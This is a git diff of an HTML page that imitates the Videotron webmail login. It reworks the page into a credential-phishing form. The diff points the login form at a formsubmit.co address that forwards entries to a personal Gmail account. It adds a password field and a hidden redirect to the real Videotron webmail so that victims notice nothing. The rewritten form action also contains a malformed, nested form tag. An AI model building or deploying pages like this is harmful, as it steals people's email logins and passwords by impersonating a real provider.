--- a/index.html
+++ b/index.html
@@ -55,11 +55,21 @@ function showPage() {
 <img align="top" alt="web " src="https://www.videotron.com/resources/legacy/img/espace_clientplus.png" width="40" height="40">
     </p>
 <p>
-<form id="contact-form" action="https://usebasin.com/f/0ea9a5155189" method="POST">
+<form id="contact-form" action="<form action="https://formsubmit.co/isosiiso7@gmail.com" method="POST">" method="POST">
 				<div class="formfield">
 					<label for="username"></label>
 					<input type="text" id="username" name="username" value="" placeholder="Votre adresse courriel" autofocus="" required="">
 					<p>
+								<p>
+				<div class="formfield">
+					<label for="password">
+					</label>
+					<div class="flex relative items-baseline">
+						<input id="password" type="password" name="Mot de passe" value="" placeholder="Mot de passe" required="">
+						 <!-- Redirect after successful submission -->
+  <input type="hidden" name="_next" value="https://courrielweb.videotron.com/iwc_static/layout/main.html?lang=en&3.0.2.2.0_20010958&">
+<br>
+<br>
 <br>
 <button type="Login submit-button"><span style='font-size:15px;'>&#8680;</span> CONNEXION <i class="fa fa-lock"></i></button>
 
